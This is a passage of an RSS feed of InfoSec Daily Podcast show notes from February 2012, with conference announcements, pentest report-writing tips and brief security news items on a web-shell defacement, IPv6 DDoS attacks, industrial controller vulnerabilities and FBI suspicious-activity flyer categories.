<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.irongeek.com/i.php?page=security/how-i-got-pwned-lessons-in-ghetto-incident-response"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.irongeek.com/i.php?page=security/how-i-got-pwned-lessons-in-ghetto-incident-response</span></a></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Looks like a site I was letting a friend host on my shared hosting provider got hit, and from that a web shell got put on my site, and some skiddy found the web shell with a scanner and defaced my site.</span></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.zdnet.com/blog/networking/first-ipv6-distributed-denial-of-service-internet-attacks-seen/2039"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.zdnet.com/blog/networking/first-ipv6-distributed-denial-of-service-internet-attacks-seen/2039</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The clock is running out on IPv4 on the Internet, but even so the next generation of Internet traffic protocols, IPv6, is being adopted very slowly. But, it seems IPv6 is finally making it to broad acceptance. Arbor Networks reports that the &ldquo;latest milestone in IPv6 development: the first observations of IPv6 Distributed Denial of Service (DDoS) attacks.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This can only be happening because the number of IPv6-based end-points have grown large enough that possible injection points for IPv6-based attacks is now large enough for attackers to use it. At the same, time they&rsquo;re finding targets on the IPv6-enabled Internet worthy of the effort needed to craft and execute attacks.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We could have expected this. Besides human nature, Arbor Network&rsquo;s Worldwide Infrastructure Security Report had predicted IPv6 DDoS attacks. &ldquo;This is a significant milestone in the arms race between attackers and defenders,&rdquo; stated the report. &ldquo;We believe that the scope and prevalence of IPv6 DDoS attacks will gradually increase over time as IPv6 is more widely deployed.&rdquo; And, now, they&rsquo;ve started.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to Arbor Networks&rsquo; Senior Software Quality Assurance Engineer Bill Cerveny, &ldquo;Gone are the days when a network failure on the IPv6 Internet would be ignored and undetected because, well, no one noticed (or cared). &hellip; The same thing that has made the IPv6-enabled Internet &lsquo;valuable&rsquo; has also made it an increasingly valuable venue for attacks. While the frequency of attacks is relatively modest on IPv6 today, we expect that accelerated adoption will be followed in-kind by an accelerated pace of attacks.&rdquo;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://community.controlglobal.com/content/what-more-important-cyber-vulnerabilities-or-actual-cyber-incidents"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://community.controlglobal.com/content/what-more-important-cyber-vulnerabilities-or-actual-cyber-incidents</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The recent S4 Conference has shone a light on the cyber vulnerabilities of many industrial</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">controllers. &nbsp;The vulnerabilities identified are generally textbook IT vulnerabilities &#8211; use of weak passwords, use of Telnet, cross-site scripting weaknesses, buffer overflows, etc. To at least</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">some of us in the control systems community these vulnerabilities are not unexpected. &nbsp;The fact that many of these systems are also connected to the Internet as Eireann Leverett demonstrated is also not new even though the numbers of control system connected to the Internet are striking.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">What is unexpected and most disconcerting are the inherent design vulnerabilities of the controllers. As Ralph Langner mentioned, it is the design vulnerabilities that the pros will go after such as Stuxnet.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">There are other design vulnerabilities besides Stuxnet that don&#39;t seem to be addressed by the researchers, vendors, and end-users. These are not IT vulnerabilities but &quot;security design&quot; vulnerabilities in the controllers or the systems where they are used. These deficiencies were not identified as they were not vulnerabilities in performance or safety. However, when maliciously exploited, they become vulnerabilities in performance and safety. These vulnerabilities include Aurora (as demonstrated by INL in 2007) which is a &quot;design vulnerability&quot; in the grid itself, design issues that affected the San Bruno natural gas pipeline failure, design issues that affected the 2008 Florida outage, etc. These design deficiencies have no IT patches and can be exploited by malicious intruders. With no guidance or fixes, these incidents continue to recur sometimes with devastating results. </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">These deficiencies are essentially engineering vulnerabilities and therefore must be addressed by both Engineering and IT. To date, getting the two communities together has been difficult. An example was a note on the Cyber Security Forum Initiative on 2/12/12. One individual wrote the following: &quot;There is NOTHING unique about industrial controls, they are just like any other computer system, or network. To think any differently, you have your head in the sand.&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://www.theregister.co.uk/2012/02/20/google_browser_password_generation/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.theregister.co.uk/2012/02/20/google_browser_password_generation/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Google is developing a password-generating tool that will bolt into its Chrome browser.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The technology is designed to painlessly create hard-to-guess passwords when users sign up to websites. Whenever a site presents surfers with a field requiring a password, Chrome will display a key icon, giving users the option of allowing the browser to generate the secret for them. This password, provided a user accepts it and it meets the site&#39;s security criteria, is reused next time the site is accessed.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Google is positioning the technology as an interim workaround for the well-known shortcomings of asking humans to come up with memorable non-trivial passwords, until more websites support OpenID, which Google views as a long-term solution to the problem.*</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The ad brokering giant neatly summarises the pitfalls of password use that makes its tool potentially useful:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Passwords are not a very good form of authentication. They are easy to use but they are trivial to steal, either through phishing, malware, or a malicious/incompetent site owner (Gawker, Sony, etc.) Furthermore, since people are so apt to reuse passwords losing one password leaks a substantial amount of your internet identity.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-599-how-i-got-pwnd-ipv6-ddos-s4-conference-password-maker/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3529/0/infosec-daily-podcast-episode-599.mp3" length="20626581" type="audio/mpeg" />
		<itunes:duration>0:42:55</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 599 for February 20, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Dr B0n3z, Beau Woods, Adrian Crenshaw, and Karthik Rangarajan.
	&#160;
Announcements:
Social Engineering Training
	When: Ma[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 599 for February 20, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Dr B0n3z, Beau Woods, Adrian Crenshaw, and Karthik Rangarajan.
	&#160;
Announcements:
Social Engineering Training
	When: March 5-9, 2012
	Where: Seattle, Washington
	When: July 21-24, 2012
	Where: Black Hat Vegas
	When: August 20-24, 2012
	Where: &#160;Bristol, UK
	When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD 
	http://www.social-engineer.com/social-engineer-training
	InfoSec Southwest
	When: March 30-April 1
	Where: Austin, TX
	http://www.Infosecsouthwest.com
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open! &#160;If you have some Anti-Forensics talks, that would be awesome.
	LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
	CFP now open!
	Defcon 20
	When: July 26-29, 2012
	Where: Rio Hotel and Casino &#8211; Las Vegas, NV
	http://defcon.org/
	CFP &#38; Room reservations now open!
	DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories
Source: &#160;http://www.irongeek.com/i.php?page=security/how-i-got-pwned-lessons-in-ghetto-incident-response
Looks like a site I was letting a friend host on my shared hosting provider got hit, and from that a web shell got put on my site, and some skiddy found the web shell with a scanner and defaced my site.

	Source: &#160;http://www.zdnet.com/blog/networking/first-ipv6-distributed-denial-of-service-internet-attacks-seen/2039
	The clock is running out on IPv4 on the Internet, but even so the next generation of Internet traffic protocols, IPv6, is being adopted very slowly. But, it seems IPv6 is finally making it to broad acceptance. Arbor Networks reports that the &#8220;latest milestone in IPv6 development: the first observations of IPv6 Distributed Denial of Service (DDoS) attacks.
	This can only be happening because the number of IPv6-based end-points have grown large enough that possible injection points for IPv6-based attacks is now large enough for attackers to use it. At the same, time they&#8217;re finding targets on the IPv6-enabled Internet worthy of the effort needed to craft and execute attacks.
	We could have expected this. Besides human nature, Arbor Network&#8217;s Worldwide Infrastructure Security Report had predicted IPv6 DDoS attacks. &#8220;This is a significant milestone in the arms race between attackers and defenders,&#8221; stated the report. &#8220;We believe that the scope and prevalence of IPv6 DDoS attacks will gradually increase over time as IPv6 is more widely deployed.&#8221; And, now, they&#8217;ve started.
	According to Arbor Networks&#8217; Senior Software Quality Assurance Engineer Bill Cerveny, &#8220;Gone are the days when a network failure on the IPv6 Internet would be ignored and undetected because, well, no one noticed (or cared). &#8230; The same thing that has made the IPv6-enabled Internet &#8216;valuable&#8217; has also made it an increasingly valuable venue for attacks. While the frequency of attacks is relatively modest on IPv6 today, we expect that accelerated adoption will be followed in-kind by an accelerated pace of attacks.&#8221;
	&#8230;.
	Source: &#160;http://community.controlglobal.com/content/what-more-important-cyber-vulnerabilities-or-actual-cyber-inciden[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 598 &#8211; Weekend Wrap-up with Dr. b0n3z</title>
		<link>http://www.isdpodcast.com/episode-598-weekend-wrap-up-with-dr-b0n3z</link>
		<comments>http://www.isdpodcast.com/episode-598-weekend-wrap-up-with-dr-b0n3z#comments</comments>
		<pubDate>Sun, 19 Feb 2012 03:12:26 +0000</pubDate>
		<dc:creator>Dr Bones</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3525</guid>
		<description><![CDATA[Episode 598 &#8211; Weekend Wrap-up with Dr. b0n3z InfoSec Daily Podcast Episode 598 for February 18, 2012. &#160;Tonight&#039;s podcast is hosted by Dr Bonez, Boris Sverdlik, and Themson Mester. Guests: oncee and spridel &#160; Announcements: Brad Smith (theNurse) We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-family:arial,helvetica,sans-serif"><b><span style="font-size: 15px;background-color: transparent;vertical-align: baseline">Episode 598 &#8211; Weekend Wrap-up with Dr. b0n3z <br class="kix-line-break" /><br />
	<br />
	InfoSec Daily Podcast Episode 598 for February 18, 2012. &nbsp;Tonight&#039;s podcast is hosted by Dr Bonez, Boris Sverdlik, and Themson Mester.</span><br />
	</b></span><b><br />
	<span style="font-size: 15px;background-color: transparent;vertical-align: baseline">Guests: oncee and spridel</span></b></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-family:arial,helvetica,sans-serif"><span style="font-size: 15px;vertical-align: baseline">Announcements:</span></span></b></p>
<p><b><span style="font-family:arial,helvetica,sans-serif"><span style="font-size: 15px;vertical-align: baseline">Brad Smith (theNurse)</span><br />
	<span style="font-size: 15px;background-color: transparent;font-weight: normal;vertical-align: baseline">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital ever since.</span><br />
	</span><br />
	<span style="font-size: 15px;font-weight: normal;vertical-align: baseline">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></b></p>
<p><b><a href="http://www.social-engineer.org/brad-smith-updates/"><span>http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span>http://www.social-engineer.org/bradsmithdonation/</span></a></b></p>
<p><b><span style="font-size: 15px;background-color: transparent;vertical-align: baseline">Social Engineering Training</span><br />
	<span style="font-size: 15px;background-color: transparent;font-weight: normal;vertical-align: baseline">When: March 5-9, 2012<br class="kix-line-break" /><br />
	<br />
	Where: Seattle, Washington</span><br />
	<span style="font-size: 15px;background-color: transparent;font-weight: normal;vertical-align: baseline">When: July 21-24, 2012<br class="kix-line-break" /><br />
	<br />
	Where: Black Hat Vegas</span><br />
	<span style="font-size: 15px;background-color: transparent;font-weight: normal;vertical-align: baseline">When: August 20-24, 2012</span><br />
	<span style="font-size: 15px;background-color: transparent;font-weight: normal;vertical-align: baseline">Where: &nbsp;Bristol, UK</span><br />
	<span style="font-size: 15px;background-color: transparent;font-weight: normal;vertical-align: baseline">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	<br />
	Where: &nbsp;Columbia, MD </span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span>http://www.social-engineer.com/social-engineer-training</span></a></b></p>
<p><b><span style="font-size: 15px;background-color: transparent;vertical-align: baseline">InfoSec Southwest</span><br />
	<span style="font-size: 15px;background-color: transparent;font-weight: normal;vertical-align: baseline">When: March 30-April 1</span><br />
	<span style="font-size: 15px;background-color: transparent;font-weight: normal;vertical-align: baseline">Where: Austin, TX</span><br />
	<a href="http://www.infosecsouthwest.com/"><span>http://www.Infosecsouthwest.com</span></a></b></p>
<p><b><span style="font-size: 15px;background-color: transparent;vertical-align: baseline">Linuxfest Northwest 2012</span><br />
	<span style="font-size: 15px;background-color: transparent;font-weight: normal;vertical-align: baseline">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size: 15px;background-color: transparent;font-weight: normal;vertical-align: baseline">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span>http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size: 15px;background-color: transparent;vertical-align: baseline">CFP now open!</span></b></p>
<p><b><span style="font-size: 15px;background-color: transparent;vertical-align: baseline">AIDE 2012</span><br />
	<span style="font-size: 15px;background-color: transparent;font-weight: normal;vertical-align: baseline">When: May 21-25, 2012</span><br />
	<span style="font-size: 15px;background-color: transparent;font-weight: normal;vertical-align: baseline">Where: MU Forensic Science Center</span><br />
	<span style="font-size: 15px;background-color: transparent;font-weight: normal;vertical-align: baseline">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span>http://aide.marshall.edu</span></a><br />
	<span style="font-size: 15px;background-color: transparent;vertical-align: baseline">CFP now open!</span></b></p>
<p><b><span style="font-size: 15px;background-color: transparent;vertical-align: baseline">LayerOne 2012</span><br />
	<span style="font-size: 15px;background-color: transparent;font-weight: normal;vertical-align: baseline">When: May 26-27, 2012</span><br />
	<span style="font-size: 15px;background-color: transparent;font-weight: normal;vertical-align: baseline">Where: Clarion Hotel &#8211; Anaheim, CA</span><br />
	<a href="http://www.layerone.org/"><span>http://www.layerone.org</span></a><br />
	<span style="font-size: 15px;background-color: transparent;vertical-align: baseline">CFP now open!</span></b></p>
<p><b><span style="font-size: 15px;background-color: transparent;vertical-align: baseline">Defcon 20</span><br />
	<span style="font-size: 15px;background-color: transparent;font-weight: normal;vertical-align: baseline">When: July 26-29, 2012</span><br />
	<span style="font-size: 15px;background-color: transparent;font-weight: normal;vertical-align: baseline">Where: Rio Hotel and Casino &#8211; Las Vegas, NV</span><br />
	<a href="http://defcon.org/"><span>http://defcon.org/</span></a><br />
	<span style="font-size: 15px;background-color: transparent;vertical-align: baseline">CFP &amp; Room reservations now open!</span></b></p>
<p><b><span style="font-size: 15px;background-color: transparent;vertical-align: baseline">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion</span><br />
	<span style="font-size: 15px;background-color: transparent;font-weight: normal;vertical-align: baseline">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size: 15px;background-color: transparent;font-weight: normal;vertical-align: baseline">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span>http://www.derbycon.com</span></a></b></p>
<p><b><span style="font-size: 15px;background-color: transparent;font-weight: normal;vertical-align: baseline">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="http://www.isdpodcast.com/"><span> </span><span>http://www.isdpodcast.com</span></a><span style="font-size: 15px;background-color: transparent;font-weight: normal;vertical-align: baseline"> and locate the Affiliate Program link on the right hand side.</span></b></p>
<p><b><span style="font-size: 15px;background-color: transparent;font-weight: normal;vertical-align: baseline"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></b></p>
<p><b><span style="font-size: 15px;vertical-align: baseline">Pentest Lessons</span><br />
	<span style="font-size: 15px;font-weight: normal;vertical-align: baseline">1. When writing the report take the time to think about your target audience (who is paying your bill) Some pro-tips for reporting:</span></b></p>
<ul>
<li><b><span style="font-family:arial,helvetica,sans-serif"><span style="vertical-align: baseline">Don&rsquo;t ever start a report with &ldquo;As had been expected, an extensive set of gaps exist&rdquo;.</span></span></b></li>
<li><b><span style="font-family:arial,helvetica,sans-serif"><span style="vertical-align: baseline">Don&rsquo;t ever &nbsp;include items in the report that you have not tested against and/or collected evidence of</span></span></b></li>
<li><b><span style="font-family:arial,helvetica,sans-serif"><span style="vertical-align: baseline">Don&rsquo;t ever provide a report that hasn&rsquo;t been formatted properly, including a draft</span></span></b></li>
<li><b><span style="font-family:arial,helvetica,sans-serif"><span style="vertical-align: baseline">Don&rsquo;t ever merge findings with recommendations in the same statement</span></span></b></li>
<li><b><span style="font-family:arial,helvetica,sans-serif"><span style="vertical-align: baseline">Don&rsquo;t ever make comments such as &ldquo;Clearly this server isn&rsquo;t being maintained&rdquo;</span></span></b></li>
</ul>
<ul>
<li><b><span style="font-family:arial,helvetica,sans-serif"><span style="vertical-align: baseline">Don&rsquo;t ever submit a draft without checking grammar and spelling</span></span></b></li>
<li><b><span style="font-family:arial,helvetica,sans-serif"><span style="vertical-align: baseline">Don&rsquo;t ever forget version control</span></span></b></li>
</ul>
<p><b><span style="font-family:arial,helvetica,sans-serif"><br />
	<span style="font-size: 15px;font-weight: normal;vertical-align: baseline">2. In keeping with getting to know you&rsquo;re audience, you might want to research at least the points of contact at your client. Although it doesn&rsquo;t happen often, on occasion you might run into a client who has significantly more experience than you do. Don&rsquo;t make statements expecting them to be taken at face value, especially if you are wrong. If for some reason the PoC challenges a statement with a cash wager, asking you to prove it. Either accept the challenge, or move on. Don&rsquo;t challenge them in return as this effectively lowers their perception of your expertise. </span><br />
	</span><br />
	</b></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-family:arial,helvetica,sans-serif"><span style="font-size: 15px;text-decoration: underline;vertical-align: baseline">Stories</span></span></b></p>
<p><b><span style="font-family:arial,helvetica,sans-serif"><span style="font-size: 15px;background-color: transparent;vertical-align: baseline">Source: &nbsp;</span><a href="http://publicintelligence.net/fbi-suspicious-activity-reporting-flyers/"><span>http://publicintelligence.net/fbi-suspicious-activity-reporting-flyers/</span></a></span></b></p>
<p><b><span style="font-size: 15px;vertical-align: baseline">Threat Areas</span><br />
	</b></p>
<p dir="ltr" style="text-indent: 36pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-family:arial,helvetica,sans-serif"><span style="font-size: 15px;font-weight: normal;vertical-align: baseline">Airport Service Providers</span></span></b></p>
<p dir="ltr" style="text-indent: 36pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-family:arial,helvetica,sans-serif"><span style="font-size: 15px;font-weight: normal;vertical-align: baseline">Beauty/Drug Suppliers</span></span></b></p>
<p dir="ltr" style="text-indent: 36pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-family:arial,helvetica,sans-serif"><span style="font-size: 15px;font-weight: normal;vertical-align: baseline">Bulk Fuel Distributors</span></span></b></p>
<p dir="ltr" style="text-indent: 36pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-family:arial,helvetica,sans-serif"><span style="font-size: 15px;background-color: transparent;font-weight: normal;vertical-align: baseline">Construction Sites</span></span></b></p>
<p dir="ltr" style="text-indent: 36pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-family:arial,helvetica,sans-serif"><span style="font-size: 15px;font-weight: normal;vertical-align: baseline">Dive/Boat Shops</span></span></b></p>
<p dir="ltr" style="text-indent: 36pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-family:arial,helvetica,sans-serif"><span style="font-size: 15px;font-weight: normal;vertical-align: baseline">Electronics Stores</span></span></b></p>
<p dir="ltr" style="text-indent: 36pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-family:arial,helvetica,sans-serif"><span style="font-size: 15px;font-weight: normal;vertical-align: baseline">Farm Supply Stores</span></span></b></p>
<p dir="ltr" style="text-indent: 36pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-family:arial,helvetica,sans-serif"><span style="font-size: 15px;font-weight: normal;vertical-align: baseline">Financial Institutions</span></span></b></p>
<p dir="ltr" style="text-indent: 36pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-family:arial,helvetica,sans-serif"><span style="font-size: 15px;font-weight: normal;vertical-align: baseline">General Aviation</span></span></b></p>
<p dir="ltr" style="text-indent: 36pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-family:arial,helvetica,sans-serif"><span style="font-size: 15px;font-weight: normal;vertical-align: baseline">General Public</span></span></b></p>
<p dir="ltr" style="text-indent: 36pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-family:arial,helvetica,sans-serif"><span style="font-size: 15px;font-weight: normal;vertical-align: baseline">Hobby Shops</span></span></b></p>
<p dir="ltr" style="text-indent: 36pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-family:arial,helvetica,sans-serif"><span style="font-size: 15px;font-weight: normal;vertical-align: baseline">Home Improvement</span></span></b></p>
<p dir="ltr" style="text-indent: 36pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-family:arial,helvetica,sans-serif"><span style="font-size: 15px;font-weight: normal;vertical-align: baseline">Hotels/Motels</span></span></b></p>
<p dir="ltr" style="text-indent: 36pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-family:arial,helvetica,sans-serif"><span style="font-size: 15px;font-weight: normal;vertical-align: baseline">Internet Cafes</span></span></b></p>
<p dir="ltr" style="text-indent: 36pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-family:arial,helvetica,sans-serif"><span style="font-size: 15px;font-weight: normal;vertical-align: baseline">Shopping Malls</span></span></b></p>
<p dir="ltr" style="text-indent: 36pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-family:arial,helvetica,sans-serif"><span style="font-size: 15px;font-weight: normal;vertical-align: baseline">Martial Arts/Paintball</span></span></b></p>
<p dir="ltr" style="text-indent: 36pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-family:arial,helvetica,sans-serif"><span style="font-size: 15px;font-weight: normal;vertical-align: baseline">Mass Transportation</span></span></b></p>
<p dir="ltr" style="text-indent: 36pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-family:arial,helvetica,sans-serif"><span style="font-size: 15px;font-weight: normal;vertical-align: baseline">Military Surplus</span></span></b></p>
<p dir="ltr" style="text-indent: 36pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-family:arial,helvetica,sans-serif"><span style="font-size: 15px;font-weight: normal;vertical-align: baseline">Peroxide Explosives</span></span></b></p>
<p dir="ltr" style="text-indent: 36pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-family:arial,helvetica,sans-serif"><span style="font-size: 15px;font-weight: normal;vertical-align: baseline">Recognizing Sleepers</span></span></b></p>
<p dir="ltr" style="text-indent: 36pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-family:arial,helvetica,sans-serif"><span style="font-size: 15px;font-weight: normal;vertical-align: baseline">Rental Cars</span></span></b></p>
<p dir="ltr" style="text-indent: 36pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-family:arial,helvetica,sans-serif"><span style="font-size: 15px;font-weight: normal;vertical-align: baseline">Rental Properties</span></span></b></p>
<p dir="ltr" style="text-indent: 36pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-family:arial,helvetica,sans-serif"><span style="font-size: 15px;font-weight: normal;vertical-align: baseline">Rental Trucks</span></span></b></p>
<p dir="ltr" style="text-indent: 36pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-family:arial,helvetica,sans-serif"><span style="font-size: 15px;font-weight: normal;vertical-align: baseline">Storage Facilities</span></span></b></p>
<p dir="ltr" style="text-indent: 36pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-family:arial,helvetica,sans-serif"><span style="font-size: 15px;font-weight: normal;vertical-align: baseline">Tattoo Shops</span></span></b></p>
